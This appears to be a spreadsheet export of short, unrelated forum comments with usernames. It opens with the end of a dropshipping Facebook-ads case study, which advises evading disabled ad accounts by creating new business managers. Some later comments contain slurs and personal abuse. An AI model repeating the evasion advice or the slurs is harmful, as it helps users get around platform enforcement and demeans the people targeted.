just waited until we could move onto phase 3. We recommend you wait until there’s at least XXX views, until you move onto phase 3. Having enough data is important for making a reliable look alike audience. The general rule you want to follow in these first two phases is to collect as much data as you can while losing the least amount of money possible. Of course you can be profitable in these first two phases as well, but it’s also okay if you’re losing a bit of money. Look Alikes will perform much better anyways so you don’t want to linger on these first two phases trying to make money through interest targeting. **PHASE 3 - TESTING LOOKALIKES &amp; RETARGETING** Phase 3 is when we start testing look alike audiences and also start a retargeting campaign. The first lookalike audience to test is 75% video viewers. You want to make 10 audiences for each percentile inclusive from 0%. That would be 0-1%, 0-2%, 0-3% and so on. You also want to make sure you’re selecting worldwide when you’re making those lookalikes. While you’re making those lookalikes, make custom audiences to use for your retargeting campaign. Make audiences from the last 7 days for Page View, Top 25% time on site, FB engagement, 75% Video View, Add to Cart, and Initiate Checkout. Setup a new CBO campaign with a daily budget of $50 to start, and use the custom audience to make 7 adsets - one for each custom audience. As far as ads go for retargeting, you should make some new ads. We like to use photo ads like this that have a really strong call to action like sale ends today. After two days, you should start adjusting the retarget budget as needed. If it’s super super profitable, you can try to squeeze more out of it by increasing the budget. If it’s not doing so hot, you should lower the budget. Try to find a good ratio between your retargeting budget and the budget for your other campaigns. Use that ratio to scale your retargeting campaign as you scale up your other budgets. Also keep in mind that cheaper products will need less retargeting, while more expensive products may benefit from heavier retargeting. If your product is really expensive, you might even want to expand the time frame included in your custom audience. After setting up the retarget, we setup a campaign with 10 adsets. Each adset was targeting one of the 10 look alikes we created before, and they all had 3 duplicates of our video. Unfortunately, the lookalike did not perform as well as we hoped. Instead of giving up, we tested a few more videos until eventually we landed on our winner. If we weren’t so lazy, we would have tested more videos from the beginning instead of just hoping that the lookalikes would perform. If you’re testing 75% Video Views and it doesn’t work well you can try testing other look alikes such as 95% Video View or Page View. You will need more data for these Look alikes though. Eventually you should find a few good look alike audiences that are working well. At that point you’re ready for phase 4. **PHASE 4 - SCALING LOOKALIKES** In phase 4 we try to scale the look alikes that are working well. This is when your results should start becoming a little more consistent. So soon as we noticed that our 1% Look alike for 75% video view was performing well, we made a new CBO campaign with a $200 budget and duped the adset 5 times. After a 2 days it was working super well, so we started doubling the budget every two days until it eventually reached $1500. When you get a campaign with this kind of budget, results really start to even out as your campaign optimizes. If you find that you’re not able to scale a campaign without performance tanking, you should try duping the campaign a few times instead. You can even dupe a campaign like 10 times if it’s working really well, but it doesn’t respond well to scaling the original budget. We stopped scaling this campaign at $1500 though and just let it run as we moved onto our favorite phase. You should also move on from this phase once you’ve spent $5000. You can leave your profitable campaigns on from this phase while you test out the last phase. **PHASE 5 - "ENDGAME" SCALING** In our fifth and final phase, we’re looking to scale sky high with broad targeting. This is what I like to call the “end game. “ Broad targeting is where you let Facebook decide basically everything besides the CBO’s budget and the ad’s creatives. As far as targeting goes, everything is left on auto pilot. I don’t give Facebook any audience whatsoever - no custom audience, no look alike, and no interests besides excluding dropshipping. For this type of campaign, I split it up into three adsets. 1 adset targeting the USA, 1 adset targeting Canada+UK+Australia+New Zealand, and 1 adset targeting worldwide with a few third world countries removed. I set a budget of $500 and just let Facebook do it’s thing. At this point, the only thing you have to do is adjust the budget. After two days, I’ll make one of two decisions. I’ll either double the budget because it’s profitable, or I’ll kill it and go back to phase 4 to collect some more data before trying again. If it’s kind of in the middle, i’ll just let it coast another day or two until the decision is clear. The reason why broad targeting is superior to all other forms of scaling is because: It requires hardly any work to maintain. You don’t have to constantly go out there find more working interests. The size is basically the entire world. It’s super easy to scale because audience size is massive, meaning that you can literally scale as high as you want. You don’t have to refresh creatives because the audience size is so big. Eventually we did hit about 50M reach on one creative and had to refresh it, but up until that point everything was pretty smooth. It optimizes over time to become better and better without you having to do anything. Meaning that once it’s optimized at a certain budget you can just crank it up, let it optimize at the next budget, and then rinse and repeat the process until you hit a point where your cash flow just simply doesn’t allow it. Luckily in the case of Mr-Posture, the broad target worked super well. I ended up scaling it to $10,000 a day and letting it coast. It ended up spending $150,000 before Facebook decided to start giving us problems. While we were coasting in Phase 5 letting the money flow in, of course we ran into some Facebook trouble. This was during a period when Facebook was randomly flagging accounts like crazy. This is still happening to some extent, but during the summer when we were running this, it was like an everyday thing. Even before we got disabled for good, we were getting disabled like every day and having to submit appeals. When we got disabled for the last time, we got around it with a new ad account under a new business manager. If you ever find yourself in a similar situation, you should simply make a new business manager and ad account. Most of the time, you’ll be able to use your original page and website without issue. Using our new ad account, we started right away with broad targeting using the original pixel. Since Facebook let’s you share pixels across business managers, it’s really easy to use your old data. We just set the budget on day 1 and let it run until this ad account was disabled too. It was probably the easiest money we’ve ever made considering we just let it run on autopilot from the start. Again these were our numbers: $528,000 in sales after accounting for returns $300,000 in ad spend between the two ad accounts $79,0000 in COGS This left us with roughly $149,000 in profit or 28% profit margins. Not bad for two months on one product. If we were going to do this again though, we probably could have done better. This is what we would have done differently. After seeing the broad campaign do so well, we should have asked Facebook to increase our spend limit on the new account We could have made another ad account after the second one was disabled We could have incorporated some other products into the store that are related to posture correction We also tested a bunch of random ad strategies like manual bidding that ended up lowering our profit in the end Overall though, we were happy with the final performance of the store. I learned a ton about how saturation works in drop shipping, and it gave me the confidence to pursue other products with even more competitors and a longer history of being sold. If you have any questions , drop them below. I don't sell courses or take clients.</t>
  </si>
  <si>
    <t>Three_Shaded_Cloud</t>
  </si>
  <si>
    <t>It reminded me a ton of Lee Bermejo’s Joker design, especially with the messy hair I’m taking my dad to see this tonight!</t>
  </si>
  <si>
    <t>McCheezn</t>
  </si>
  <si>
    <t>R-I-C-E Rest, Ice, Compression, Elevation.</t>
  </si>
  <si>
    <t>EccentricOwl</t>
  </si>
  <si>
    <t>Apparently it’s just a known issue bug :/</t>
  </si>
  <si>
    <t>I've had good results using m1 carbine .30 cal projectiles loading into my 7.62 NATO brass for a cheaper low recoil plinking load for my CETME.</t>
  </si>
  <si>
    <t>Ketawahn</t>
  </si>
  <si>
    <t>very funny is : Spawn: be in factory with only 2 ways to go hear shots look right look left dead not even moved</t>
  </si>
  <si>
    <t>thejca</t>
  </si>
  <si>
    <t>A few weeks? They must not care about customer retention, especially if you had to call to get some free trades to tide you over. In a few weeks a large majority of the RH exodus will of already migrated to one of the other 4 brokers.</t>
  </si>
  <si>
    <t>DeterminedErmine</t>
  </si>
  <si>
    <t>I asked him if he wanted to get a drink with me, and apologised if it was inappropriate to ask (wasn’t sure if he was seeing anyone, etc). I don’t think I’ve hidden my intentions. I’m just not really sure how to convey during the date that I’m into him. Smile a lot? Buy him a drink?</t>
  </si>
  <si>
    <t>XkandyyX_</t>
  </si>
  <si>
    <t>Tfue and Cloak are friends again?</t>
  </si>
  <si>
    <t>Sparkly1982</t>
  </si>
  <si>
    <t>That's not a spoon... This is a spoon.</t>
  </si>
  <si>
    <t>cappilla</t>
  </si>
  <si>
    <t>Give money to my immediate family and then hire a private jet and travel the world</t>
  </si>
  <si>
    <t>CoomassieBlue</t>
  </si>
  <si>
    <t>Do you know what some of your triggers are? Mine are more biomechanical than, say, foods or hormones - neck strain and teeth clenching/grinding are what get me. I find that I get both tension headaches and migraines; for my tension headaches, Excedrin + ibuprofen works while triptans don't, and for my migraines only triptans work. However, they both feel very similar, and the tension headaches can be just as hellish as the migraines. I do wonder if you're getting bad tension headaches rather than migraines, although obviously there are migraineurs who just don't respond to triptans. Info on your triggers would help flesh out that idea a little more :)</t>
  </si>
  <si>
    <t>pringlesies</t>
  </si>
  <si>
    <t>&gt; An **apostle** ([/əˈpɒsəl/](https://en.wikipedia.org/wiki/Help:IPA/English)), in its most literal sense, is an emissary, from [Greek](https://en.wikipedia.org/wiki/Ancient_Greek) ἀπόστολος (*apóstolos*), literally "one who is sent off", from the [verb](https://en.wikipedia.org/wiki/Verb) ἀποστέλλειν (*apostéllein*), "to send off".</t>
  </si>
  <si>
    <t>DaHamMan3</t>
  </si>
  <si>
    <t>Submit support ticket online and start a live chat, got the money in 30 min</t>
  </si>
  <si>
    <t>EuphoricMacaroon</t>
  </si>
  <si>
    <t>Oh my goodness. Thank you so much.</t>
  </si>
  <si>
    <t>OopsieDoopsie369</t>
  </si>
  <si>
    <t>You, um... You didnt see this before the rest of the subreddit could?</t>
  </si>
  <si>
    <t>&gt;&gt;73087485 what is this? and what is that background with the planet / timezones. does it update in realtime?</t>
  </si>
  <si>
    <t>JB-Reps</t>
  </si>
  <si>
    <t>Why did you scam £220 off me? I have full evidence for anybody and I will be reporting this to the admins</t>
  </si>
  <si>
    <t>Military</t>
  </si>
  <si>
    <t>Just wondering what's happened to this piece. Was it sold or? Mil</t>
  </si>
  <si>
    <t>antonivs</t>
  </si>
  <si>
    <t>All of that is more or less true, but I think it misses the point. What the original comment seems to have been trying to get at is that there's no universally applicable objective morality - one that applies to everyone regardless of what axioms they accept. Something encoded into the fabric of the universe somehow, for example. This implies that moral facts are framework dependent, which gives us moral relativism. You can't claim a moral fact is objectively true without specifying which moral framework(s) it applies in.</t>
  </si>
  <si>
    <t>throwarund</t>
  </si>
  <si>
    <t>Huh, didn't knew about their kickstarter, EVERSPACE 1 was pretty fun game and they seem to be dropping the most annoying bit (the roguelite part)</t>
  </si>
  <si>
    <t>NotthatFLman</t>
  </si>
  <si>
    <t>Crooked Can is always the best representative of Central Florida, I'm glad they've got another medal for the collection.</t>
  </si>
  <si>
    <t>ameenbusiness666</t>
  </si>
  <si>
    <t>Nothing beats the classic</t>
  </si>
  <si>
    <t>In N Out - cheeseburger, mustard fried, raw onions, no pickles and extra lettuce; animal fries and a dr. Pepper 😋</t>
  </si>
  <si>
    <t>ItsPanther</t>
  </si>
  <si>
    <t>One day at work myself I was riding the forklift like a scooter, just like killing time at the end of my shift. And I thought I had the place to myself because I work late and so I was super bored and just thinking stupid cause that’s how I do, and thought it would be pretty fun to attach my belt to the forklift so I could steer with my hips, and so I undid my belt and looped it around and right as I hooked it all together I looked up and my supervisor was looking at me, belt around the forklift, just watching. He had no reason to be there (I thought at the time) so I like freaked out and probably looked moronic trying to undo my belt and then just said to him “well this is weird to explain” and we just walked our separate ways and yeah Tldr: boss prolly thinks I was trying to bang the forklift</t>
  </si>
  <si>
    <t>&gt;&gt;110616538 The left has consistently been critical of China for its atrocious human rights violations, you mouth breathing troglodyte. The reason people complain about Trump's trade war against China is that it's being done in a retarded protectionism form that has repeatedly proven to fail as a tactic (like when W. tried it over a decade ago) and hurts the world economy and threatens to send the entire world into another recession. There's merit in intellectual theft, etc. But you have to be smart about it because going 20th century tariff war has a long history of failure and biting your own ass.</t>
  </si>
  <si>
    <t>ArcaneSyntax</t>
  </si>
  <si>
    <t>Wishful thinking doesnt make it so. If you seriously think this controversy has hurt them considerably i may have a bridge to sell you.</t>
  </si>
  <si>
    <t>mrcatisgodone</t>
  </si>
  <si>
    <t>Man, been quite a wealth of gold from Oktoberfest this year. Germans in my drinking experience are too cool for school to show they're wrecked. Seems at the big beer knees up they go fucking tonto.</t>
  </si>
  <si>
    <t>LeonardoTheCreator</t>
  </si>
  <si>
    <t>As a casual MMA fan, I'm very familiar with Velasquez but not at all with Tyson Fury (I've heard his name but nothing more). I was actually surprised with the pop that Cain got.</t>
  </si>
  <si>
    <t>km569</t>
  </si>
  <si>
    <t>Thanks! It feels like I spend more time detailing it than driving it hahaha</t>
  </si>
  <si>
    <t>pjPhoenix</t>
  </si>
  <si>
    <t>No, demonize 10 because hes a child who doesn't understand what's going on other than hes a kid on a basketball team and he wants to play. Fucking ridiculous, treating him like hes a bad guy because hes not bending over backwards to appease the parents of the special needs kid. Hes a fucking kid, all he knows about the situation is hes playing a game.</t>
  </si>
  <si>
    <t>kortiz46</t>
  </si>
  <si>
    <t>Literally only subscribed because I had super FOMO from the last pop up. I thought they offered really good products</t>
  </si>
  <si>
    <t>issybird</t>
  </si>
  <si>
    <t>The closer he gets, the better she looks.</t>
  </si>
  <si>
    <t>FluffYerHead</t>
  </si>
  <si>
    <t>There are no limitations, at least in Mortal Empires. Obviously, you both can't play the same faction but any combination works. For example, one can play High Elf and another Dark Elf. However, I would caution when choosing a good and evil co-op campaign. It is definitely doable but the AI will make it difficult. It will be hard to hold standing with similar race AI because they will always hate your partner due to racial aversion and may drag you into wars. However, this can all be circumvented with the No Racial Aversion mod. I play nothing but co-op and I try to pick starting factions by closest vicinity. On occasion at campaign start, one of us will travel to the other if reasonable travel time (less than several turns). Let us know on what you decide. PS if you are having trouble picking certain races, are you sure both of you have all DLC? That could be an issue too.</t>
  </si>
  <si>
    <t>CDR Design, LLC</t>
  </si>
  <si>
    <t>What is the reason you might consider painting?</t>
  </si>
  <si>
    <t>Chelstopes</t>
  </si>
  <si>
    <t>Dude you look the exact same if not better than you did 5 years ago</t>
  </si>
  <si>
    <t>satya3684</t>
  </si>
  <si>
    <t>What do you consider true cinema? You think all fantasy movies aren't true cinema like lotr,star wars and star trek ?</t>
  </si>
  <si>
    <t>Shutterbug390</t>
  </si>
  <si>
    <t>They're pretty hard to mistake. I love in an area where they're common and have never seen someone genuinely confused, though stuff like this is a fairly common joke.</t>
  </si>
  <si>
    <t>Miller5862</t>
  </si>
  <si>
    <t>Relax it was an exageration i cant afford to buy 900 accounts all at once. The point is all my brothers all my sisters all my aunts and uncles want my character to get strong and carry lol... i cant help it if they want me to rise to power.. if they wanted to do anything theyd use ip and macs just to limit it to make there job easier.. but they dont plan on doing that so why limit it when its just more money for them.. dont be an idiot either they are for or against and as of right now they are for you buying as many accounts as possible..</t>
  </si>
  <si>
    <t>K447</t>
  </si>
  <si>
    <t>Originally Posted by Luke Kamp ... Where are these reports of the new manifolds deleting ribbon not providing gains? I dont have the links at hand. When the plastic intake manifolds first appeared for the 2018 model year it was something of a hassle to extract the ribbon. Early experimenters removed the ribbon on some machines, left it in on others, and some did comparative testing before and after removing. Most were SVHO engines but some were non-supercharged. After a while the general feeling was that removing the ribbon from the plastic intake manifold might provide a small gain but might also not be worth the trouble. On the SVHO engine removing the ribbon slightly changes the air:fuel ratios for the middle two cylinders, allowing them to run slightly more lean. The aftermarket tunes apparently now adjust fuel mapping to compensate.</t>
  </si>
  <si>
    <t>TeamYellowHK</t>
  </si>
  <si>
    <t>Have you guys ever thought about what we are going to do about water after achieving independence?</t>
  </si>
  <si>
    <t>Anibo</t>
  </si>
  <si>
    <t>I still remember the day my dad called me and my brother out sick at school randomly and took us to the big zoo the next city over. It was a great day.</t>
  </si>
  <si>
    <t>DeltaThinker</t>
  </si>
  <si>
    <t>How far to the left and right of the couch is optimal? Is as far as possible to the corner best?</t>
  </si>
  <si>
    <t>PotatoPotahto</t>
  </si>
  <si>
    <t>[unknown] thought this was a Miura when I drove past. Circled back to get a picture and now I'm clueless.</t>
  </si>
  <si>
    <t>Carpet_bomb_furries</t>
  </si>
  <si>
    <t>I’m 25 and I absolutely love TikTok. Such great content and vine energy. Except it’s depressing because all it does is remind me how much I miss being a teenager</t>
  </si>
  <si>
    <t>lare604</t>
  </si>
  <si>
    <t>Quote: : I’m 10 weeks 4 days and terrified of a missed miscarriage when I go for my appointment in two weeks. I have nausea daily, some worse than others, food aversions, very large sore breasts, I’m very tired and I have occasional stretching. What are the chances I would still be feeling these things and it not be a viable pregnancy? Literally no reason to think this other than anxiety. 5 Posts l lare604 I'm no expert but I think you do not need to stress. I worry about this too though! I literally had NO symptoms with my first other than fatigue and now he is a healthy 2 year old! Good luck mama! I think we are both over stressing!</t>
  </si>
  <si>
    <t>jerseygirl217</t>
  </si>
  <si>
    <t>Very pretty young lady! You got this!</t>
  </si>
  <si>
    <t>ldorsey15</t>
  </si>
  <si>
    <t>thank you very much. I’ll find out tomorrow afternoon from the blood test what my HCG levels are. I’m hoping that will be my BFP I still have the cramping and food adversion so here is to hoping</t>
  </si>
  <si>
    <t>Daniel</t>
  </si>
  <si>
    <t>Got this got son for his birthday and he absolutely loves it.</t>
  </si>
  <si>
    <t>Quoting: Anonymous Coward 78066008 the 4:00 minute mark... ok</t>
  </si>
  <si>
    <t>Norunenick</t>
  </si>
  <si>
    <t>I think is Solari - but with a mix of Lunari = maybe we get a movement in Diana x Leona x ADC champ? And that could mean that the small VGU for Diana is even closer!</t>
  </si>
  <si>
    <t>adiMachineLearning</t>
  </si>
  <si>
    <t>Bc there is the stereotype of men loving meat, being tough, how has it affected your life?</t>
  </si>
  <si>
    <t>r-PictureGame</t>
  </si>
  <si>
    <t>Congratulations, that was the correct answer! It's your turn to post the next round - please continue the game **in the next 5 minutes**. A few tips: * I've DM'd you a link to submit your round with the correct title. * Make sure your round can't be solved using Reverse-Image-Search (RIS): * Google isn't the only RIS engine! Try using a browser extension like Reveye ([Chrome](https://chrome.google.com/webstore/detail/keaaclcjhehbbapnphnmpiklalfhelgf), [Firefox](https://addons.mozilla.org/en-US/firefox/addon/reveye-ris/)) to check multiple engines at once. * If you need to, you can apply a mask to your image to trick RIS. Try our online masking tool [here](https://imagemasker.github.io). * Once you've got the next round up, let us know how you solved this one! * Feel free to join us in our [Discord Server](https://discord.gg/D2t9fN2) to discuss your round and future rounds. * For more detailed information, check out our [Complete Rules](/r/PictureGame/wiki/rules) and [Hosting Guide](/r/PictureGame/wiki/hosting). --- ^^I ^^am ^^a ^^bot. ^^If ^^I ^^don't ^^work, ^^please [^^PM ^^my ^^master](https://www.reddit.com/message/compose/?to=Provium) ^^or [^^message ^^the ^^moderators.](https://www.reddit.com/message/compose?to=%2Fr%2FPictureGame) [^^Learn ^^more](/r/PictureGame_Bot)</t>
  </si>
  <si>
    <t>GraveGaming</t>
  </si>
  <si>
    <t>Shut the fuck up.</t>
  </si>
  <si>
    <t>yoyo1212</t>
  </si>
  <si>
    <t>The phone call, people can spin it anyway they like the dem's have there own version, at the end of the day we know Biden and his son are crooks now thanks to the phone call Biden will never be president now. Nancy knows the true phone call transcript there is nothing to impeach on.</t>
  </si>
  <si>
    <t>dgl6y7</t>
  </si>
  <si>
    <t>Ironic.</t>
  </si>
  <si>
    <t>Homegirl</t>
  </si>
  <si>
    <t>@JeanLouiseFinch @Tinkrbl44 Label from Green Giant hash brown cauliflower patties. 12 carbs per 2 patties. It would depend, then, on how many other carbs someone is eating per day. Love to be home . . . thus the screen name. Joined 2003.</t>
  </si>
  <si>
    <t>Lilhelmsy22</t>
  </si>
  <si>
    <t>Not sure but he’s a wavy dude</t>
  </si>
  <si>
    <t>ajslideways</t>
  </si>
  <si>
    <t>Another vote for The Unfair Advantage.</t>
  </si>
  <si>
    <t>&gt;&gt;22174886 No, it's only just begun. Things will get worse from here on out.</t>
  </si>
  <si>
    <t>english4lifes</t>
  </si>
  <si>
    <t>If this is your first contract in china stay out of a tier 3 city. Try to get a contract in a tier one city and at worse a tier two city. You will get eaten alive in a tier 3 City.</t>
  </si>
  <si>
    <t>AwNawtiq</t>
  </si>
  <si>
    <t>I think hes saying its dumb that rich people can walk free while if youre too poor for bond then you have to stay and probably lose your job that you need.</t>
  </si>
  <si>
    <t>yatsey</t>
  </si>
  <si>
    <t>You have to at least give one example of a basic human right that has been removed in order to be so cocky with your answers. I'm from the UK, and we're far more draconian in our right to free speech than the EU as a whole. I do believe that inciting violence is wrong, but our government has been abusing this. The EU has not.</t>
  </si>
  <si>
    <t>CydoniaKnight</t>
  </si>
  <si>
    <t>The complete lack of chill from the broadcast regarding baseball superstition is kinda funny.</t>
  </si>
  <si>
    <t>legend531</t>
  </si>
  <si>
    <t>i know mui gogeta is gonna be an absolue MONSTER when it comes to power and skills. however the team also has some very powerful characters too like ssb vegito/gogeta kkk20 which are the strongest in team. and including jiren and mui goku makes it harder as well. but seeing how massively the gap is between ssbkk20 and mui, i think gogeta blue FAR outpowers anyone in the team with complete ease. ITS GOGETA WHO WE'RE TALKING ABOUT I would mui gogeta wins the fight. but with HIGH difficulty mui gogeta will literally just ONE SHOT SSBE Vegeta G.O.D Toppo LSSJ2 Kefla Aniraza Time-Skip Hit Golden Frieza Fusion Zamasu and LB Jiren then proceeds to fight the rest which i think would be pretty tough but victory will come down to mui gogeta</t>
  </si>
  <si>
    <t>truealwaystrue</t>
  </si>
  <si>
    <t>For the one that doesn't love the one with the amazing heart. Why do you consciously choose to try to break someone's heart this hard. There must be something wrong within your own heart that doesn't let you find part of heart that needs to be loved just as the one who has that amazing heart. Now do him / her a favor let them live a peaceful life. This way someone will come along and do what you couldn't do and love with all your heart. Sad</t>
  </si>
  <si>
    <t>nighttime-hashbrown</t>
  </si>
  <si>
    <t>Thicc books always made me so happy cause by the time I was hooked I just carry it around with me everywhere in case I had time to read/ as a low key flex and when people would say "thats a big book!" Id just smile to myself and say "I know &lt;3"</t>
  </si>
  <si>
    <t>dhodra</t>
  </si>
  <si>
    <t>Red Dead Redemption 2. Map is not small, but is certainly less stretched out than most AAA open world games. What's more amazing is that every location is unique and has its own kind of people. You'll often find yourself revisiting the same towns, so there is definitely a sense of purpose behind the landscape. Characters are also very fleshed out and their motives are not "black and white" like many other games. It doesn't follow the generic good guy vs. bad guy storyline, which I found to be a breath of fresh air as well.</t>
  </si>
  <si>
    <t>henryisyourboss</t>
  </si>
  <si>
    <t>I hope Langford plays Friday. Anxious to see how he does.</t>
  </si>
  <si>
    <t>Unreasonably_Manic</t>
  </si>
  <si>
    <t>Not even trying to argue, but you’re deluding yourself if you think scream was the only person preaching head level crosshair placement. Also, of course you can’t hit every headshot, but plenty of people(pros included) whiff sprays too. So if you’re criteria is 100% hit rate, just use the knife. If two players have a fight, and one aims head and the other doesnt, assuming neither miss, the one aiming at the head wins everytime. Thats enough reason to aim head level imo. But, like I said, positives and negatives to both.</t>
  </si>
  <si>
    <t>Seymore_Trucks</t>
  </si>
  <si>
    <t>Perhaps if your school played by the same rules of baseball as everybody else, then I would have pity. Until then, suffer</t>
  </si>
  <si>
    <t>ContextualRobot</t>
  </si>
  <si>
    <t>[BBC Question Time](https://twitter.com/bbcquestiontime) ^verified | Reach: 518929 | Location: UK Bio: The BBC's flagship political debate programme. Use #bbcqt to get involved in the discussion. ***** ^I ^am ^a ^bot. ^Any ^complaints ^&amp; ^suggestions ^to ^/r/ContextualBot ^thanks</t>
  </si>
  <si>
    <t>AirdropFaucet</t>
  </si>
  <si>
    <t>Death note movie</t>
  </si>
  <si>
    <t>americanmarks</t>
  </si>
  <si>
    <t>This video is a few years old right?</t>
  </si>
  <si>
    <t>mike_d85</t>
  </si>
  <si>
    <t>Fun fact, there's actually more wheat in Kikkoman Soy Sauce than soy (except for the gluten free variety).</t>
  </si>
  <si>
    <t>bluthru</t>
  </si>
  <si>
    <t>It's not exactly sophisticated, but you can throw a dark blanket on the floor, too.</t>
  </si>
  <si>
    <t>Carolha</t>
  </si>
  <si>
    <t>It is 6:22am and I haven't had my coffee yet. Too early for this but thanks for the laughs. It's going to be a fabulous day! Geez I need to stop by here more often.</t>
  </si>
  <si>
    <t>erraticpaladin5</t>
  </si>
  <si>
    <t>Cool so now there are going to be less available stalls for men and the workers are going to have to clean up more piss</t>
  </si>
  <si>
    <t>MentosFreshmaker19</t>
  </si>
  <si>
    <t>The video is the news piece.</t>
  </si>
  <si>
    <t>northwesternerd</t>
  </si>
  <si>
    <t>It's the compost bin, silly. Trash is a different bin. Recycling is another.</t>
  </si>
  <si>
    <t>fistofthefuture</t>
  </si>
  <si>
    <t>Shapiro seems to have a strong lack of understanding that Trump's own appointees are the ones punting this impeachment to the democrats.</t>
  </si>
  <si>
    <t>PositiveAlcoholTaxis</t>
  </si>
  <si>
    <t>I was in London recently and it surprised me how much it reminded me of Birmingham.</t>
  </si>
  <si>
    <t>ChaplnGrillSgt</t>
  </si>
  <si>
    <t>Both players are goons. Green deserved to get tossed. Grey should have been in the box for a minor as well.</t>
  </si>
  <si>
    <t>just4fun8787</t>
  </si>
  <si>
    <t>Ok, I'm pretty done with your wall of text verbal diarrhea. If you want to be the least self aware blowhard I've blocked all day that's fine.</t>
  </si>
  <si>
    <t>AspireAgain</t>
  </si>
  <si>
    <t>HMS Nelson, HMS Rodney, HMS Malaya, HMS Valiant, HMS Queen Elizabeth and HMS Barham, October 1939. [2050x1532]</t>
  </si>
  <si>
    <t>Starcop</t>
  </si>
  <si>
    <t>You have fantasies of the government making you have sex with men? Faggot</t>
  </si>
  <si>
    <t>Kufat</t>
  </si>
  <si>
    <t>(I think you replied to the wrong post. I wasn't the one who suggested she should've entered a guilty plea; that was the parent of the comment of mine that you replied to.)</t>
  </si>
  <si>
    <t>Profane21</t>
  </si>
  <si>
    <t>Sexy Sjokz next to the trophy</t>
  </si>
  <si>
    <t>BuffBreastsMaeve</t>
  </si>
  <si>
    <t>I'm trying to rescue you from the darkness brother. Your manhood vision must be recalibrated.</t>
  </si>
  <si>
    <t>Harvey</t>
  </si>
  <si>
    <t>Originally Posted by Francis Benali (on loan) Could work in theory, but none of the best 400m runners are likely to enter because it falls just before their event. And there's no room in the programme to stick it at the end, so it's going to be a bit Mickey Mouse. Also not convinced it does much for the sport watching relatively unknown male 400m runners flying past all time greats like Allyson Felix as she's not moving. That was my thoughts, it was a bit humiliating for the women to be made to look like they running through treacle. I just found it a bit uncomfortable to watch.</t>
  </si>
  <si>
    <t>agusyeee</t>
  </si>
  <si>
    <t>Congrats!!! But your belt is bothering me its to high my sensei always tells it looks like its choking me</t>
  </si>
  <si>
    <t>mawktheone</t>
  </si>
  <si>
    <t>I don't assume for an instant that you're in favour of violence. You're articulate which means you're likely educated and capable, that doesn't usually coincide with being a goon. But there are some fairly enormous hurdles to a peaceful unification. That's largely down to the fact that some people are getting screwed out of their comfort. That could be a huge number of people losing the NHS cover they were relying on, or simply their free Amazon shipping. But mostly job losses in the public sector on one side or the other of the border. Potentially 100s of thousands of them I wonder too what we could do better together. Aquaculture and salt water pumped hydro storage through the HV interconnect to UK and Europe to bolster renewable grids? Mid voyage at sea refueling for heavy freight crossing the North pole? Probably something</t>
  </si>
  <si>
    <t>ronchee1</t>
  </si>
  <si>
    <t>What¿</t>
  </si>
  <si>
    <t>N3rdism</t>
  </si>
  <si>
    <t>And he called the pullout a "brilliant strategic move", gods this man has a special place in hell ready for him</t>
  </si>
  <si>
    <t>onetimeonlyy</t>
  </si>
  <si>
    <t>Meant to say, I breastfeed but I've tried to give some formula in the hope he stays asleep longer... It's not working at all. But others do say it works... Worth trying?</t>
  </si>
  <si>
    <t>&gt;&gt;68727272 Magic Arena but the game picks it for you based on how many lands it thinks you'd want</t>
  </si>
  <si>
    <t>Boomer incapable of articulating more than a one word sentence when faced with the world around him Checks out</t>
  </si>
  <si>
    <t>aismallard</t>
  </si>
  <si>
    <t>You can charge money, but any derivatives can be freely created. This prevents things like selling exclusive merch or rights, which is what film companies want to do after a release.</t>
  </si>
  <si>
    <t>salieri145</t>
  </si>
  <si>
    <t>The way I cured my social anxiety was through watching social interactions, which lead to understand social interactions. Understanding what is happening leads to competents, true confidence comes from competents.</t>
  </si>
  <si>
    <t>grindhouse-a-gogo</t>
  </si>
  <si>
    <t>Well, I mean, I gave my examples. Characters that you might not otherwise expect to see added to the game, I guess. Bit players from previous games, maybe.</t>
  </si>
  <si>
    <t>BocoRam18</t>
  </si>
  <si>
    <t>Because they don't actually understand what is and isn't protected under teh 1st amendment. Also they probably don't actually know or have ever read the harassment statute in Colorado, and haven't read the police report. Lastly they aer internet trolls who get off on this type of stuff.</t>
  </si>
  <si>
    <t>Renekat0n</t>
  </si>
  <si>
    <t>Would you do 35k you think?</t>
  </si>
  <si>
    <t>Mike Denton</t>
  </si>
  <si>
    <t>Is the fridge available?</t>
  </si>
  <si>
    <t>aflockofsvigals</t>
  </si>
  <si>
    <t>I waited over 30 minutes for my order at that location. Never again.</t>
  </si>
  <si>
    <t>madewithsticks</t>
  </si>
  <si>
    <t>I’m a picker and a chooser</t>
  </si>
  <si>
    <t>dsifriend</t>
  </si>
  <si>
    <t>The Education System had been underfunded previously. She *broke* it.</t>
  </si>
  <si>
    <t>Logan_No_Fingers</t>
  </si>
  <si>
    <t>https://magazine.atavist.com/american-hippopotamus?no-overlay&amp;preview The long-form article American Hippopotamus is one of the GREAT reads. Really, everyone should do themselves a favor &amp; read that. It's long but amazing.</t>
  </si>
  <si>
    <t>hughk</t>
  </si>
  <si>
    <t>The husband was **not"" a diplomat. A British person working for the government overseas outside the embassy or consulate does not automatically get protection any more than a US employee of an American company. British dependents of other than senior staff don't automatically get a diplomatic passport.</t>
  </si>
  <si>
    <t>johnnysmitch</t>
  </si>
  <si>
    <t>I can do that - PM me your email and I can send a money request</t>
  </si>
  <si>
    <t>littlbrowndog</t>
  </si>
  <si>
    <t>How can I apologise Am blocked 😂😂🤣🤣</t>
  </si>
  <si>
    <t>7 years $250m If you tell me you wouldn’t make that deal I won’t believe you.</t>
  </si>
  <si>
    <t>carnack</t>
  </si>
  <si>
    <t>Except for the OLB's covering RBs and TE's downfield part.</t>
  </si>
  <si>
    <t>Shaolinraiden</t>
  </si>
  <si>
    <t>Happy to help. I'm glad It was what we were trying to find. Thank you very much for generous gratitude! On the pairing multiple watches question; I'm not sure, I think that's dependant on the bluetooth version/android version. I know that the galaxy wearable app will let you pair multiple bluetooth products. I haven't tried with watches though. There's an xda thread saying you can pair as many as you want but it can only sync data/use controls from one at a time and they have to be different models(s2/s3/sport) or it makes you factory reset every time because of the same model number for some reason.</t>
  </si>
  <si>
    <t>PorkChopPolice95</t>
  </si>
  <si>
    <t>whoa someone gave you items! well done!!</t>
  </si>
  <si>
    <t>jelloapcalysp</t>
  </si>
  <si>
    <t>All my friends left me lol spend the weekend doing nothing on a a weekday I come home eat go to the gym and watch Netflix or anime I genuinely have no one to make plans with and the people I was gonna go to camp flog gnaw with flaked but I know at least that’s gonna be fun second year going anyways this weekend is gonna be like the rest filled with nothing</t>
  </si>
  <si>
    <t>ElPlywood</t>
  </si>
  <si>
